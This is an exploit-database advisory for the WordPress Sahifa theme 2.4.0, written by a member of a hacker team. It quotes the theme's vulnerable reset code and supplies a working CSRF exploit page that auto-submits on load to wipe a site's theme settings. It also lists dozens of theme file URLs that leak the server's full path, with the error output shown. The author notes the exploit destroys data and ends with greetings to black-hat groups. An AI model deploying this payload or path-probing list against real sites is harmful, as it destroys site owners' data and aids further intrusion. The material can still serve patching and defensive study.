1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

============================================
Software: Wordpress Sahifa theme Version: 2.4.0
Vendor: http://themes.tielabs.com/
Software License: Shareware *cost $45*
Vulnerabilities: This software is prone to CSRF and FULL PATH DISCLOSURE vulnerabilities.
============================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
============================================

[*] CSRF VULNERABILITY [*]


The following CSRF exploit on successfully exploitation will "reset" site settings.
Be Careful: It will lead to data destruction (you will lost your site settings)

Here is that vulnerable code sections:

File: panel/mpanel-ui.php
==SECTION 1=========BEGIN SNIP=================

<form method="post">
<div class="mpanel-reset">
<input name="reset" class="mpanel-reset-button" type="submit"
onClick="if(confirm('All settings will be rest .. Are you sure ?')) return true ; else return false; " value="Reset Settings" />
<input type="hidden" name="action" value="reset" />
</div>
</form>
=================== END SNIP =====================


File: panel/mpanel-functions.php

===SECTION 2=======BEGIN SNIP===================

        if( isset( $_REQUEST['action'] ) ){
                if( 'reset' == $_REQUEST['action'] ) {
                        global $default_data;
                        tie_save_settings( $default_data );
                        header("Location: admin.php?page=panel&reset=true");
                        die;
                }
        }
=============== END SNIP =====================




============ BEGIN CSRF EXPLOIT ============
<h1>Wordpress sahifa theme CSRF exploit By AkaStep<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://hacker1.own/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit"  value="Reset Settings" />-->
</form>

============ END OF CSRF EXPLOIT ============



[*]  FULL PATH DISCLOSURE:  [*]

Just Direct access:


http://hacker1.own/wp/wp-content/themes/sahifa/category.php

Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/category.php on line 1

Other files also disclosures similar info.

Here is that files:

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/shortcode.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php?page[]=

Warning: htmlentities() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php on line 2

http://hacker1.own/wp/wp-content/themes/sahifa/panel/post-options.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/notifier/update-notifier.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/custom-slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/mpanel-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar-footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/author.php

http://hacker1.own/wp/wp-content/themes/sahifa/index.php
Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/index.php on line 1

http://hacker1.own/wp/wp-content/themes/sahifa/search.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/comments.php
http://hacker1.own/wp/wp-content/themes/sahifa/archive.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/widgetize-theme.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/common-scripts.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/theme-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/updates.php
http://hacker1.own/wp/wp-content/themes/sahifa/page.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-sitemap.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-tags.php
http://hacker1.own/wp/wp-content/themes/sahifa/single.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-related.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-news-pic.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-google.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-custom-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-posts.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-text-html.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-feedburner.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-ads.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-flickr.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-video.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-tabbed.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-search.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-social.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-twitter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-facebook.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-reviews.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-counter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-comments-avatar.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-head.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-meta.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/single-post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/breaking-news.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-timeline.php
http://hacker1.own/wp/wp-content/themes/sahifa/loop.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-feed.php
http://hacker1.own/wp/wp-content/themes/sahifa/tag.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-restrict.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-blog.php
http://hacker1.own/wp/wp-content/themes/sahifa/404.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-authors.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar.php

=========================== HAPPY NEW YEAR! ==================================


================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
           To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep